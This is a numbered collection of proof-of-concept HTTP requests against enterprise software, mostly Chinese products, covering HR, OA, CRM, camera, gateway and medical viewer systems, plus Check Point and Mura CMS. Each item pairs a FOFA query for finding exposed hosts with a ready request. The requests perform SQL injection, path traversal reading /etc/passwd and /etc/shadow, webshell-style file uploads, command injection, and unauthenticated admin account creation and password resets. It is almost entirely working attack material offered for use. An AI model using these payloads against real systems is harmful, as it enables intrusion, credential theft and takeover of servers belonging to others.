GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the csrf value and then a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--